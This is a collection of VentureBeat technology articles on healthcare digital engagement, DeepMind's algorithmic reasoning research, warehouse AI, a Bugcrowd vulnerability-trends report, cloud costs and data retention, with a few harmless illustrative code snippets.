15067
2021
"25% of patients prefer communicating with their provider digitally | VentureBeat"
"https://venturebeat.com/2021/09/24/25-of-patients-prefer-communicating-with-their-provider-digitally"
"1 in 4 patients remain loyal to their healthcare provider because it’s easier to communicate with them digitally, pointing to a forthcoming surge in demand for digital offerings as technology-native generations increasingly take ownership of their healthcare, according to research from Patientco. COVID-19 has been a catalyst for change within the healthcare industry as demand for consumer-friendly resources has increased tenfold. While healthcare systems’ main priority should always be patient health and safety, it shouldn’t end there — a core objective should include leveraging today’s digital innovations to propel patient engagement. This takes meeting patients where they are to fuel positive patient experiences and health outcomes. 
Patientco’s 2021 State of the Patient Financial Experience report found 1 in 4 patients remain loyal to their healthcare provider because it’s easier to engage with them digitally, a trend expected to continue as technology-native generations seek care. The digital trends born during the pandemic are also here to stay. Nearly eight in ten providers plan to make their pandemic-driven telehealth policies permanent, even after COVID-19 subsides, demonstrating that patients are looking to engage with healthcare providers on their own terms. A strong digital footprint is a critical component of a vibrant healthcare ecosystem. Healthcare providers realize that digital investments will be vital to their organization’s success and getting patients back in for care following the pandemic. Providers have made strides, but there remains an ongoing need for them to foster trust with their patients, especially when it comes to their finances. Concerns about out-of-pocket costs are the #1 reason patients have skipped or delayed healthcare — not fear of contracting COVID-19. It’s clear that healthcare organizations should not stick with the status quo for their patient engagement strategy. There is ample opportunity — and demand — for better patient-provider interactions, from scheduling the patient’s first visit to accepting payment after treatment. The onus is on health system leaders to ensure every touchpoint of the healthcare journey reflects their commitment to achieving positive health outcomes for the patients and communities they serve. Read the full report by Patientco, now a part of Waystar. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. 
© 2023 VentureBeat. All rights reserved. "
15068
2021
"DeepMind aims to marry deep learning and classic algorithms | VentureBeat"
"https://venturebeat.com/2021/09/10/deepmind-aims-to-marry-deep-learning-and-classic-algorithms"
"Will deep learning really live up to its promise? We don’t actually know. But if it’s going to, it will have to assimilate how classical computer science algorithms work. This is what DeepMind is working on, and its success is important to the eventual uptake of neural networks in wider commercial applications. Founded in 2010 with the goal of creating AGI — artificial general intelligence, a general purpose AI that truly mimics human intelligence — DeepMind is on the forefront of AI research. The company is also backed by industry heavyweights like Elon Musk and Peter Thiel. Acquired by Google in 2014, DeepMind has made headlines for projects such as AlphaGo, a program that beat the world champion at the game of Go in a five-game match, and AlphaFold, which found a solution to a 50-year-old grand challenge in biology. 
Now DeepMind has set its sights on another grand challenge: bridging the worlds of deep learning and classical computer science to enable deep learning to do everything. If successful, this approach could revolutionize AI and software as we know them. Petar Veličković is a senior research scientist at DeepMind. His entry into computer science came through algorithmic reasoning and algorithmic thinking using classical algorithms. Since he started doing deep learning research, he has wanted to reconcile deep learning with the classical algorithms that initially got him excited about computer science. Meanwhile, Charles Blundell is a research lead at DeepMind who is interested in getting neural networks to make much better use of the huge quantities of data they’re exposed to. Examples include getting a network to tell us what it doesn’t know, to learn much more quickly, or to exceed expectations. When Veličković met Blundell at DeepMind, something new was born: a line of research that goes by the name of Neural Algorithmic Reasoning (NAR), after a position paper the duo recently published. NAR traces the roots of the fields it touches upon and branches out to collaborations with other researchers. And unlike much pie-in-the-sky research, NAR has some early results and applications to show for itself.

Algorithms and deep learning: the best of both worlds

Veličković was in many ways the person who kickstarted the algorithmic reasoning direction in DeepMind. With his background in both classical algorithms and deep learning, he realized that there is a strong complementarity between the two of them. What one of these methods tends to do really well, the other one doesn’t do that well, and vice versa. 
“Usually when you see these kinds of patterns, it’s a good indicator that if you can do anything to bring them a little bit closer together, then you could end up with an awesome way to fuse the best of both worlds, and make some really strong advances,” Veličković said. When Veličković joined DeepMind, Blundell said, their early conversations were a lot of fun because they have very similar backgrounds. They both share a background in theoretical computer science. Today, they both work a lot with machine learning, in which a fundamental question for a long time has been how to generalize — how do you work beyond the data examples you’ve seen? Algorithms are a really good example of something we all use every day, Blundell noted. In fact, he added, there aren’t many algorithms out there. If you look at standard computer science textbooks, there’s maybe 50 or 60 algorithms that you learn as an undergraduate. And everything people use to connect over the internet, for example, is using just a subset of those. “There’s this very nice basis for very rich computation that we already know about, but it’s completely different from the things we’re learning. So when Petar and I started talking about this, we saw clearly there’s a nice fusion that we can make here between these two fields that has actually been unexplored so far,” Blundell said. The key thesis of NAR research is that algorithms possess fundamentally different qualities to deep learning methods. And this suggests that if deep learning methods were better able to mimic algorithms, then generalization of the sort seen with algorithms would become possible with deep learning. To approach the topic for this article, we asked Blundell and Veličković to lay out the defining properties of classical computer science algorithms compared to deep learning models. Figuring out the ways in which algorithms and deep learning models are different is a good start if the goal is to reconcile them. 
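The generalization question raised above, how to work beyond the data examples you have seen, can be made concrete with a toy experiment (an illustrative sketch, not from the article): a learner that merely memorizes training examples looks fine near its training range but fails badly far outside it, while the underlying algorithm is exact everywhere.

```python
# Toy contrast between a memorizing "learner" and an exact algorithm.
# The target function f(x) = 2 * x stands in for any algorithmic task.

def algorithm(x):
    # The classical algorithm: correct for any input, any size.
    return 2 * x

# "Training data": inputs 0..10 with correct outputs.
train = {x: algorithm(x) for x in range(11)}

def nearest_neighbor_predict(x):
    # A 1-nearest-neighbor "model": answers with the output of the
    # closest training input. It has no notion of the underlying rule.
    closest = min(train, key=lambda t: abs(t - x))
    return train[closest]

# In-range, the learner matches the algorithm...
assert nearest_neighbor_predict(7) == algorithm(7)
# ...but far outside the training range it is badly wrong:
assert nearest_neighbor_predict(1000) == 20  # echoes f(10), not 2000
assert algorithm(1000) == 2000
```

The memorizer is a deliberately crude stand-in for a trained model, but the failure mode is the same one described for neural networks below: nothing in the learned mapping forces the rule to hold beyond the data it has seen.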
Deep learning can’t generalize

For starters, Blundell said, algorithms in most cases don’t change. Algorithms consist of a fixed set of rules that are executed on some input, and usually good algorithms have well-known properties. For any kind of input the algorithm gets, it gives a sensible output, in a reasonable amount of time. You can usually change the size of the input and the algorithm keeps working. The other thing you can do with algorithms is you can plug them together. The reason algorithms can be strung together is because of this guarantee they have: Given some kind of input, they only produce a certain kind of output. And that means that we can connect algorithms, feeding their output into other algorithms’ input and building a whole stack. People have been looking at running algorithms in deep learning for a while, and it’s always been quite difficult, Blundell said. As trying out simple tasks is a good way to debug things, Blundell referred to a trivial example, the copy task: an algorithm whose output is simply a copy of its input. It turns out that this is harder than expected for deep learning. You can learn to do this up to a certain length, but if you increase the length of the input past that point, things start breaking down. If you train a network on the numbers 1-10 and test it on the numbers 1-1,000, many networks will not generalize. Blundell explained, “They won’t have learned the core idea, which is you just need to copy the input to the output. And as you make the process more complicated, as you can imagine, it gets worse. So if you think about sorting through various graph algorithms, actually the generalization is far worse if you just train a network to simulate an algorithm in a very naive fashion.” Fortunately, it’s not all bad news. “[T]here’s something very nice about algorithms, which is that they’re basically simulations. 
You can generate a lot of data, and that makes them very amenable to being learned by deep neural networks,” he said. “But it requires us to think from the deep learning side. What changes do we need to make there so that these algorithms can be well represented and actually learned in a robust fashion?” Of course, answering that question is far from simple. “When using deep learning, usually there isn’t a very strong guarantee on what the output is going to be. So you might say that the output is a number between zero and one, and you can guarantee that, but you couldn’t guarantee something more structural,” Blundell explained. “For example, you can’t guarantee that if you show a neural network a picture of a cat and then you take a different picture of a cat, it will definitely be classified as a cat.” With algorithms, you could develop guarantees that this wouldn’t happen. This is partly because the kind of problems algorithms are applied to are more amenable to these kinds of guarantees. So if a problem is amenable to these guarantees, then maybe we can bring across into the deep neural networks classical algorithmic tasks that allow these kinds of guarantees for the neural networks. Those guarantees usually concern generalizations: the size of the inputs, the kinds of inputs you have, and their outcomes that generalize over types. For example, if you have a sorting algorithm, you can sort a list of numbers, but you could also sort anything you can define an ordering for, such as letters and words. However, that’s not the kind of thing we see at the moment with deep neural networks.

Algorithms can lead to suboptimal solutions

Another difference, which Veličković noted, is that algorithmic computation can usually be expressed as pseudocode that explains how you go from your inputs to your outputs. This makes algorithms trivially interpretable. 
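Both properties mentioned above, generality over any ordered type and logic that reads like pseudocode, are visible in even the simplest classical algorithm. A minimal insertion sort (an illustrative sketch, not anything from DeepMind's work):

```python
def insertion_sort(items, key=lambda x: x):
    """Sort a list by inserting each element into its place.
    Works for any element type, given an ordering via `key`."""
    result = []
    for item in items:
        # Scan for the position where `item` belongs among sorted items.
        i = 0
        while i < len(result) and key(result[i]) <= key(item):
            i += 1
        result.insert(i, item)
    return result

# The same algorithm sorts numbers...
assert insertion_sort([3, 1, 2]) == [1, 2, 3]
# ...and words, because both types define an ordering:
assert insertion_sort(["pear", "apple", "fig"]) == ["apple", "fig", "pear"]
# ...or anything else, under any ordering you supply:
assert insertion_sort(["pear", "fig", "apple"], key=len) == ["fig", "pear", "apple"]
```

Nothing about the procedure changes across the three calls; only the ordering does, which is exactly the kind of type-level generalization the article says current neural networks lack.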
And because they operate over these abstractified inputs that conform to some preconditions and post-conditions, it’s much easier to reason theoretically about them. That also makes it much easier to find connections between different problems that you might not see otherwise, Veličković added. He cited the example of MaxFlow and MinCut as two problems that are seemingly quite different, but where the solution of one is necessarily the solution to the other. That’s not obvious unless you study it from a very abstract lens. “There’s a lot of benefits to this kind of elegance and constraints, but it’s also the potential shortcoming of algorithms,” Veličković said. “That’s because if you want to make your inputs conform to these stringent preconditions, what this means is that if data that comes from the real world is even a tiny bit perturbed and doesn’t conform to the preconditions, I’m going to lose a lot of information before I can massage it into the algorithm.” He said that obviously makes the classical algorithm method suboptimal, because even if the algorithm gives you a perfect solution, it might give you a perfect solution in an environment that doesn’t make sense. Therefore, the solutions are not going to be something you can use. On the other hand, he explained, deep learning is designed to rapidly ingest lots of raw data at scale and pick up interesting rules in the raw data, without any real strong constraints. “This makes it remarkably powerful in noisy scenarios: You can perturb your inputs and your neural network will still be reasonably applicable. For classical algorithms, that may not be the case. And that’s also another reason why we might want to find this awesome middle ground where we might be able to guarantee something about our data, but not require that data to be constrained to, say, tiny scalars when the complexity of the real world might be much larger,” Veličković said. Another point to consider is where algorithms come from. 
Usually what happens is you find very clever theoretical scientists, you explain your problem, and they think really hard about it, Blundell said. Then the experts go away and map the problem onto a more abstract version that drives an algorithm. The experts then present their algorithm for this class of problems, which they promise will execute in a specified amount of time and provide the right answer. However, because the mapping from the real-world problem to the abstract space on which the algorithm is derived isn’t always exact, Blundell said, it requires a bit of an inductive leap. With machine learning, it’s the opposite, as ML just looks at the data. It doesn’t really map onto some abstract space, but it does solve the problem based on what you tell it. What Blundell and Veličković are trying to do is get somewhere in between those two extremes, where you have something that’s a bit more structured but still fits the data, and doesn’t necessarily require a human in the loop. That way you don’t need to think so hard as a computer scientist. This approach is valuable because often real-world problems are not exactly mapped onto the problems that we have algorithms for — and even for the things we do have algorithms for, we have to abstract problems. Another challenge is how to come up with new algorithms that significantly outperform existing algorithms that have the same sort of guarantees.

Why deep learning? Data representation

When humans sit down to write a program, it’s very easy to get something that’s really slow — for example, that has exponential execution time, Blundell noted. Neural networks are the opposite. As he put it, they’re extremely lazy, which is a very desirable property for coming up with new algorithms. “There are people who have looked at networks that can adapt their demands and computation time. In deep learning, how one designs the network architecture has a huge impact on how well it works. 
There’s a strong connection between how much processing you do and how much computation time is spent and what kind of architecture you come up with — they’re intimately linked,” Blundell said. Veličković noted that one thing people sometimes do when solving natural problems with algorithms is try to push them into a framework they’ve come up with that is nice and abstract. As a result, they may make the problem more complex than it needs to be. “The traveling [salesperson], for example, is an NP-complete problem, and we don’t know of any polynomial time algorithm for it. However, there exists a prediction that’s 100% correct for the traveling [salesperson], for all the towns in Sweden, all the towns in Germany, all the towns in the USA. And that’s because geographically occurring data actually has nicer properties than any possible graph you could feed into traveling [salesperson],” Veličković said. Before delving into NAR specifics, we felt a naive question was in order: Why deep learning? Why go for a generalization framework specifically applied to deep learning algorithms and not just any machine learning algorithm? The DeepMind duo wants to design solutions that operate over the true raw complexity of the real world. So far, the best solution for processing large amounts of naturally occurring data at scale is deep neural networks, Veličković emphasized. Blundell noted that neural networks have much richer representations of the data than classical algorithms do. “Even inside a large model class that’s very rich and complicated, we find that we need to push the boundaries even further than that to be able to execute algorithms reliably. It’s a sort of empirical science that we’re looking at. And I just don’t think that as you get richer and richer decision trees, they can start to do some of this process,” he said. Blundell then elaborated on the limits of decision trees. “We know that decision trees are basically a trick: If this, then that. 
What’s missing from that is recursion, or iteration, the ability to loop over things multiple times. In neural networks, for a long time people have understood that there’s a relationship between iteration, recursion, and the current neural networks. In graph neural networks, the same sort of processing arises again; the message passing you see there is again something very natural,” he said. Ultimately, Blundell is excited about the potential to go further. “If you think about object-oriented programming, where you send messages between classes of objects, you can see it’s exactly analogous, and you can build very complicated interaction diagrams and those can then be mapped into graph neural networks. So it’s from the internal structure that you get a richness that seems like it might be powerful enough to learn algorithms you wouldn’t necessarily get with more traditional machine learning methods,” Blundell explained. "
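The message passing Blundell describes can be sketched in a few lines (a toy illustration of the aggregation pattern, not DeepMind's implementation, with no learned weights): each node updates its state by combining its own feature with messages aggregated from its neighbors, which is the core computation a graph neural network layer is built around.

```python
# One toy message-passing step on a small undirected graph.

graph = {
    0: [1, 2],
    1: [0, 2],
    2: [0, 1, 3],
    3: [2],
}

# One scalar feature per node.
features = {0: 1.0, 1: 2.0, 2: 3.0, 3: 4.0}

def message_passing_step(graph, features):
    """New feature per node = average of its own feature and the
    mean of its neighbors' messages (a minimal 'update' function)."""
    updated = {}
    for node, neighbors in graph.items():
        messages = [features[n] for n in neighbors]
        aggregated = sum(messages) / len(messages)
        updated[node] = (features[node] + aggregated) / 2
    return updated

new_features = message_passing_step(graph, features)
# Node 3 only hears from node 2, so it moves toward node 2's feature:
assert new_features[3] == (4.0 + 3.0) / 2  # 3.5
```

A real GNN layer would replace the fixed averaging with learned transformations of the messages, but the object-to-object messaging structure, the part Blundell compares to object-oriented programming, is already all here.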
15069
2021
"AI technology modernizes warehouse management | VentureBeat"
"https://venturebeat.com/2021/11/01/ai-technology-modernizes-warehouse-management"
"Like all other elements in the enterprise, the warehouse management stack is becoming increasingly automated and more intelligent by the day. That said, the technology is not focused solely on the warehouse floor and the needs of an expanding robotics workforce. Instead, you’ll find just as much activity happening behind the scenes with planning, provisioning, and other processes carried out by unseen software modules. These new tools will play a crucial role in smoothing out the many bumps that still exist in the warehouse management sector, and perhaps provide crucial relief to an over-stressed supply chain.

Key applications

Warehouse optimization platform developer Lucas Systems recently highlighted the five ways in which AI is expected to impact warehouses and distribution centers, only one of which involved robots. 
Key issues like dynamic product slotting, where products are transferred from one place to another, and workforce planning will be simplified significantly, at least for human managers. In addition, performance management and safety metrics can be more easily met with AI support, and it will even help workers navigate around extremely dynamic and fast-moving environments more easily and safely. Despite this, recent research from Vanson Bourne shows that while most warehouse directors and managers have high hopes for AI, few are using it for much beyond inventory management. Part of this is due to the lack of internal knowledge and experience with what is a radically new approach to systems and process management. Additionally, there is still lingering fear, uncertainty, and doubt regarding aspects like risk and control. This will have to change soon, considering most executives say they expect upwards of 60% ROI on their AI investments within five years. AI will also help transform the physical warehouse, overseeing often crucial functions like power management and temperature control, and eventually, it may even alter the size and location of facilities. Peter Lewis, founder and chairman of Wharton Equity Partners, sees a world in which fully automated micro centers could provide better service and better quality products, particularly food, to underserved communities. Rural areas would be key beneficiaries of these new warehouses, which would require minimal infrastructure and only a modest workforce, if any, to operate.

Intelligent links in the chain

By transforming a warehouse into an intelligent, automated entity, the enterprise also takes a giant step forward in breaking down the silos that hamper performance across supply chains and distribution tactics. Jerry Stephens, VP of global sales at Outlier AI Inc. 
says a connected warehouse overcomes many of the key roadblocks that prevent all elements of this intricate system from working together as they should. For one thing, greater visibility into inventory and the movement of goods can proactively help managers to stay ahead of emerging problems rather than take corrective action after productivity has been impacted. Additionally, planning and optimization platforms can operate in near real-time thanks to the rapid analytics that AI can provide. In this way, AI can boost productivity and revenue by targeting all the key steps in delivering goods and services to the market, namely, demand planning, manufacturing, transportation, and fulfillment. In the warehouse, in particular, organizations will keep better track of meaningful changes in multiple key performance indicators, not just across days or weeks but by the hour. Ultimately, we can expect AI to further integrate warehouse management into the enterprise data stack. Even the robots on the floor will become data generators, feeding vital information back to AI-driven software. The end goal is to create a more visible, interactive warehouse that is more adaptable and far more responsive to the many rapid and minute changes affecting the supply chain. But just as in other aspects of the enterprise, AI-driven warehousing is not simply a platform to be deployed but a fundamental change in the way data, systems, and human operators interact with one another. It will take a concerted effort to first convert warehouse management to this new mode of operation, and then even greater determination to guide its adaptation to suit each enterprise’s unique business model. 
"
15070
2022
"Accidental exposure of sensitive data has been surging, Bugcrowd finds | VentureBeat"
"https://venturebeat.com/2022/01/18/accidental-exposure-of-sensitive-data-has-been-surging-bugcrowd-finds"
"Instances where sensitive internal data was accidentally left exposed shot upward in 2021, ranking significantly higher in the latest vulnerability report from bug bounty platform Bugcrowd. The 2022 edition of the Bugcrowd Priority One Report ranked vulnerability types based upon frequency of reports from the platform’s community of researchers. The report excluded the Apache Log4j vulnerability because the report’s timeframe started with the fourth quarter of 2020 and ran through the end of the third quarter of 2021. The Log4j remote code execution flaw was disclosed in December.

Speed vs. security

In Bugcrowd’s latest report, one vulnerability type — sensitive data exposure involving internal assets — made a particularly massive gain. The vulnerability jumped to the No. 3 position, from No. 
9 in the previous year’s report. This ascendance is “a reflection of the fact that COVID basically forced the entire planet to do a whole bunch of unnatural stuff, really quickly, when it came to technology,” Bugcrowd founder and chief technology officer Casey Ellis said in an interview. In other words, “haste is the natural enemy of security,” he said. The increased prevalence of sensitive internal data exposure is also concerning because any instance of this happening “tends to be pretty catastrophic in its consequences,” Ellis said. Exposure of sensitive data will often lead to a breach or fine related to the CCPA or GDPR privacy regulations, for instance. An infamous example of the issue is a misconfiguration, or negligence, that leaves an Amazon S3 (Simple Storage Service) bucket open and accessible. “That can happen quite easily when you’ve got a lot of developers working on a project quickly. And they’ll just dump some stuff onto the internet so that everyone can use it for work — but then they forget to take it down,” Ellis told VentureBeat. “Or, they don’t secure it properly as they put it up on the internet, because that’s too hard. ‘Why would I go through the internal security team, when I can just use a credit card and get an S3 bucket and toss it up there — and we’ll get the job done more quickly.'” Exposing sensitive internal data is thus a “really easy mistake to make,” but also “easy to avoid” if the right incentives are there for developers to do so, he said.

Web app flaws

The two vulnerability types that ranked at the top in Bugcrowd’s report, in terms of frequency, are typically not as consequential — though they still can be, depending on the situation. Ranking at No. 1 in the report was cross-site scripting, which moved up from No. 2 in the prior year’s report. 
Also known as XSS, cross-site scripting is a web application bug that has existed since the 2000s but remains very common and difficult to avoid, Ellis said. The vulnerability can allow attackers to send malicious code to end users of a web application. The increased prevalence of XSS reflects the “rapid deployment of home-grown web applications throughout 2020 and 2021,” Bugcrowd said in its report — another case of velocity resulting in corners being cut around security. With the dramatic rise in work-from-home and digital commerce during the pandemic, “the priority for a lot of software development over the past two years has been ease of access,” Ellis said. “The problem with that is, if the customer can access it, then the bad guys probably can as well.” At No. 2 on the vulnerability list was a type of broken access control — insecure direct object references, or IDOR. The flaw — which had ranked at No. 1 in the prior year’s report — involves the use of access permissions to do something that shouldn’t be possible. An example is accessing someone else’s banking or health care record just by entering a different record number after you’ve logged in to the site. “If you increment that record number, what should happen is it should say, ‘Sorry, you’re not authorized to access this.’ Or even better, a 404 error,” Ellis said. “But it doesn’t always happen like that.” Log4j While the vulnerability in Log4j, a widely used Java logging library, was revealed outside the timeframe of the Bugcrowd report, the flaw cuts across several vulnerability types. It’s similar in some ways to an unvalidated redirect vulnerability (No. 9 in the report) as well as to broken access control, Ellis said — but the core of the flaw is an issue with input sanitization, which is not one of the vulnerabilities on the list. With the Log4j flaw, “the trigger was a lack of input sanitization, which is actually an injection issue.
You could execute commands in a place where you shouldn’t have been able to do that,” he said. Misaligned incentives Ultimately, many software vulnerabilities derive from the “imperative of the developer to make the thing work,” Ellis said. Developers are generally not measured or compensated based on making sure that what they create “doesn’t do all the stuff it shouldn’t,” he said. And that, unfortunately, is “where security vulnerabilities tend to exist.” This dynamic is foundational to why Ellis founded Bugcrowd a decade ago, he said. The thesis from the start was to create incentives for finding vulnerabilities, given that those incentives do exist for cyber criminals, according to Ellis. There are hopeful signs, however. In sectors including software and financial services, Bugcrowd saw a major uptick in activity in 2021 around uncovering bugs. In the software sector, payouts grew 73%. And in financial services, valid submissions to the Bugcrowd platform climbed by 82%, while payouts jumped 106%. Financial services companies, in particular, are now starting to promote their security initiatives as a way to differentiate, Ellis said. “We’re seeing the financial services companies that we work with use bug bounty and vulnerability disclosure as a way of saying, ‘We do take [customer] security seriously — before a breach,'” he said. It’s another indicator that cybersecurity is being viewed less as an “insurance policy” and more as a priority that can help the business, Ellis said. “I think that’s actually a big shift for the industry, in general,” he said.
"
15,071
2,022
"The struggle to keep cloud budgets in check | VentureBeat"
"https://venturebeat.com/2022/02/06/the-struggle-to-keep-cloud-budgets-in-check"
"The struggle to keep cloud budgets in check By Maxim Melamedov, CEO and cofounder of Zesty. Cloudy with a chance of pitfalls The cloud is among the most widely adopted digital tools of the past decade. Almost all of us rely on it every single day for our email, our work tools, our storage — the list goes on. But much like the clouds in the sky, the virtual cloud is also in a constant state of flux, both in the way it works and the ways we use it, with new storms always brewing. In a recent survey of CIOs and CTOs, we were able to identify some of the pressing challenges they are facing with public cloud environments. The research found that budgetary strain was the number one concern facing people directly charged with managing cloud costs.
Indeed, the CIOs and CTOs surveyed said they expected cloud spending to comprise 47% of the technology budget for SMEs in 2022 — a whopping 67% increase from 2021. If this trend continues, such spending will likely account for over half of technology budgets by 2023. These numbers reflect the deep reliance on the cloud in today’s business environment — but they also raise rightful concerns among innovation leaders who want to know why the cloud — which was supposed to help save money — has quickly gobbled up their budgets. Here are a few reasons: Cloud budgets: People don’t know what they don’t know Technological innovation looks toward the future, even when the future is hard to predict. Accordingly, more than half (58%) of the CIOs and CTOs said they have difficulty predicting future cloud needs, resulting in preemptive overspending despite maturing finops (cloud financial operations) capabilities. Technology leaders do see the value in finops — 100% of them told us as much — but the question remains: which finops technology is best suited to the specific needs of an organization? Executives aren’t always sure. Despite the recognized value afforded by finops implementation, only 29% of CIOs and CTOs have what they consider a mature strategy in place that allows them to evolve and plan more efficiently from one year to the next. Money isn’t the only thing getting wasted in a cloud budget Despite widespread reliance on cloud services, 58% of respondents reported that the hardest element of managing cloud costs was the initial search for a cloud offering that best matches their workload needs. Those who work regularly with the cloud are probably aware of the all-too-common risk of overprovisioning resources.
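That overprovisioning risk is easy to make concrete once utilization is actually measured. A minimal sketch (the instance names and the 40% cutoff are arbitrary illustrations, not survey data):

```python
def flag_overprovisioned(instances, threshold=0.40):
    """Return names of instances whose average utilization sits below threshold.

    `instances` maps an instance name to its average CPU utilization (0.0-1.0).
    The 40% cutoff is an arbitrary illustration; a real rightsizing policy
    would also weigh memory, network, and burst patterns.
    """
    return sorted(name for name, util in instances.items() if util < threshold)

fleet = {"web-1": 0.72, "web-2": 0.18, "batch-1": 0.05, "db-1": 0.55}
print(flag_overprovisioned(fleet))  # ['batch-1', 'web-2']
```

Even a crude report like this turns a vague "we might be overspending" into a concrete list of rightsizing candidates.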
In fact, 42% of CIOs and CTOs reported suboptimal resource utilization as the primary challenge they face when strategizing cloud use. This blend of redundant overprovisioning, garnished with an inability to scale quickly in the face of shifting needs and circumstances, yields a bitter cocktail of wasted resources. It is no surprise, then, that the second- and third-greatest cloud challenges were difficulty in justifying budget increases (34%) and difficulty in adhering to allocated cloud budgets (31%), respectively. Keeping up with an abundance of moving parts Budgets aren’t the only factor that leaders must be keenly aware of. According to 42% of survey respondents, the number one cloud priority before the pandemic was security investments, but with the financial blow that COVID-19 dealt to many organizations and the myriad of other concerns on these technologists’ minds in the wake of the pandemic, this has since dropped to fourth place (18%). The priorities that have risen in its stead are revenue-related, such as aligning the speed of IT delivery with the speed of business (25%), ensuring that compliance needs are met (22%), and increasing direct revenues (20%). However, among those using a multicloud or hybrid-cloud strategy, security is still the top priority (59%). CIOs are understandably averse to relying on a single vendor’s security protocols and feel their data is safer in a multicloud environment. Priority number two, close behind at 56%, is harnessing the technological advantages offered by specific cloud providers — for example, those that provide AI-integrated cloud capabilities — with cost efficiency reported as the third consideration (39%) when going multicloud or hybrid. These results suggest that choosing between budget, performance, and stability when constructing a cloud strategy is an ongoing issue. At its best, the cloud is meant to relieve companies and their employees of a slew of burdens, not add to the pile.
But the technology’s ever-shifting landscape has brought us to a point where managing the cloud has become a burden unto itself. As we look towards the future of the cloud, identifying the origin of today’s storm is the first step in the search for tomorrow’s brighter skies. Maxim Melamedov is the CEO and cofounder of Zesty. "
15,072
2,022
"It’s time to light the match and burn your data | VentureBeat"
"https://venturebeat.com/2022/03/26/its-time-to-light-the-match-and-burn-your-data"
"It’s time to light the match and burn your data If you spend time reading the latest quarterly results from any company, there will undoubtedly be discussion of how much they invest and how good they are at analyzing and using information. Silicon Valley is filled with companies that are dedicated to creating, consuming and analyzing huge amounts of data. We have been told that data is a currency, its value increasing as ever more complex, sophisticated technologies are applied to derive insight. However, if data is not only a currency but also a debt instrument, its intrinsic value can quickly turn negative. The value of old data: A new calculus The value of information is obvious: it is needed across nearly all functions of an organization, from small local businesses to the largest financial services and technology companies.
But information risk calculations remain inconsistent. Information security-related risks have been highlighted by commentators, breaches and ransomware attacks. Yet, even with these well-known risks, organizations often struggle to delete, well, anything. There are three primary reasons that businesses have been reluctant to delete data: (1) its potential value or use at some point in the future, (2) legal or compliance concerns regarding spoliation or deleting the wrong information and (3) an incomplete view of information across the organization. The first issue is often the most difficult to resolve. Marketing, sales, development and product teams have an insatiable appetite for data to deliver results. The idea of deleting information, even if nominally used today, that might provide unique insights in the future is terrifying. And the ever-increasing sophistication of analytics capabilities provides the ability to draw subtle inferences without significant incremental investment. In contrast, legal and compliance concerns are generally becoming more manageable. For a long time, the risk of spoliation in legal proceedings, or improper/accidental deletion of corporate records, far outweighed the benefit of deleting anything. Legal and compliance teams are battle-scarred from over a decade of litigation and regulatory enforcement actions where data issues were at the forefront. But this experience also taught these teams there is risk associated with information, and they can see that the calculus of keeping data versus deleting data is changing. In addition, early experience with global privacy requirements, such as GDPR, has provided further risk validation. The new calculus is based on a balance of variables and a multiplying factor that is associated with sensitive information.
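The "new calculus" can be sketched as a toy score: information's value offset by its risk, with the risk scaled up by a sensitivity multiplier. All of the numbers and weights below are illustrative assumptions, not a published methodology:

```python
def retention_score(value, risk, sensitivity_multiplier=1.0):
    """Toy net score for a dataset: positive suggests keeping it,
    negative marks it as undergrowth to dispose of.

    A sensitivity_multiplier greater than 1 models the idea that sensitive
    information carries risk in proportion to the insight it offers.
    """
    return value - risk * sensitivity_multiplier

# Ordinary operational data: modest value, modest risk -- worth keeping.
print(retention_score(value=10, risk=4))  # 6.0

# The same nominal value, but highly sensitive -- a deletion candidate.
print(retention_score(value=10, risk=4, sensitivity_multiplier=3.0))  # -2.0
```

The point of even a toy model like this is that it forces every dataset to carry an explicit risk term, rather than being valued on upside alone.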
First, all parts of an organization need to accept that possession of information represents risk, in addition to value. Second, sensitive information that may provide high levels of insight carries equal levels of potential risk. Finally, enterprises need to establish effective means to dispose of information they do not need once its value and retention obligations have passed. The big new variable: privacy The insurance industry is not often viewed as a driving force behind change. It is highly regulated in most jurisdictions and has developed risk models based on a long history of claims and events. These dynamics have effectively forced the industry to adapt slowly to change, require significant retrospective data analysis and maintain long data retention periods. And yet, we may see the insurance industry now quietly leading the new charge. Long before big data, machine learning and advanced analytics ever graced the latest technology journals, actuarial sciences in the insurance industry had blazed a trail. However, analyses were largely backward-looking, based on similar previous events, to predict future risk. In recent years, the insurance industry adopted practices that created vast amounts of information, consumed in real time, to develop its models. In the process, the industry created new risk, which it is still trying to fully comprehend. For example, many insurance companies now offer potential savings in automotive insurance if allowed to monitor driving habits in real time. These applications capture tremendous amounts of information, from duration and distance to acceleration, speed and other attributes for a given individual. This allows the companies to create models of risk and alter coverage rates based on this analysis. At the same time, they are creating vast amounts of sensitive private information. Insurance companies also now develop insurability scores and models, based on extraordinary aggregation of publicly and privately available data.
The aggregation of this data comprises some of the most expansive views of an individual’s habits, practices and personal information. It is updated constantly by insurers, providers and third-party suppliers, and feeds any number of models, systems and automated processes. All this data creates value in developing risk models and serving customers. But it also generates a tremendous amount of highly sensitive, private information. Actuaries on the job The National Association of Insurance Commissioners (NAIC) is an organization that few have likely encountered. Insurance regulation is largely state-based in the U.S., and the NAIC creates standards and model rules to be adopted as practices by insurance companies or codified in statute or regulation. The NAIC has a history of model rules that deal with information security, records retention and privacy, focused on protecting information and organizations and on making data available to regulators. However, with new statutes being adopted across many U.S. states, and experience with the EU’s General Data Protection Regulation (GDPR) that governs the use, access and rights associated with information, the NAIC realized a more privacy-centric model was necessary. Through a working group, they sought to distill obligations and lessons from GDPR, along with the CCPA, CPRA and CDPA, and provide a common set of requirements that include: the right to opt out of data sharing; the right to limit data sharing unless the consumer opts in; the right to correct information; the right to delete information; the right to data portability; and the right to restrict the use of data. The elements are not particularly unique, but the insurance industry was among the first to realize that the sheer scale of what may confront them from a privacy perspective could overwhelm existing technologies and practices. Nearly every single person in global developed markets is a customer of an insurance company. What happens if just a fraction exercise one of the rights noted above?
It will dwarf the volume of preservation requests handled for litigation or regulatory purposes. And what about all the sensitive information that is long past its retention requirements, but was never deleted? Burning the undergrowth: establishing the value of your data Enterprises need to establish practices and technologies that address the full range of privacy obligations in the EU and emerging in the U.S. Ridding your organization of information with limited value or beyond its retention period is a critical first step. Many organizations have struggled with routine data deletion; now they must prepare to do it on demand, potentially for many of their customers. Like undergrowth in the forest, information provides value up to a point. It then risks burning the whole forest if not managed or removed. Organizations should start with establishing the value of information and clearly understanding what represents undergrowth and risk. Then, they should light the match and burn what they should not have or no longer need. George Tziahanas is managing director at Breakwater Solutions.
"
15,073
2,022
"How digital experiences are fueling the new digital economy | VentureBeat"
